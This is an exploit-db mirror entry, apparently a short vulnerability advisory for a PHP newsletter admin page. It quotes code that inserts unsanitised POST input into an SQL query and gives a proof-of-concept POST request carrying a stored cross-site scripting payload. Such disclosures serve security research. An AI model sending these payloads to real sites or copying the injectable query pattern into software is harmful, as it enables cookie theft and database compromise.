bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10337.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

34 lines
No EOL
880 B
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#################################################################
#
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################
Theres probably a lot more vulnerabilities in their web apps, but
I could not even get them to work out of the box..
http://server/newsletter/admin/addlist.php
Look no sanitization:
8<-------snip---------8<
if(isset($_POST['submit']))
{
$list=$_POST['list'];
if(strlen($list)<1)
{
print "You did not enter the name of the email list.";
}
else
{
$addemail="Insert into m_newsletters(newslettername) values('$list')";
mysql_query($addemail) or die("Could not add list");
print "List added.";
}
8<-------snip---------8<
POC POST request:
list=<script>alert('i could get your cookie')</script>&submit=submit
Reference in a new issue View git blame Copy permalink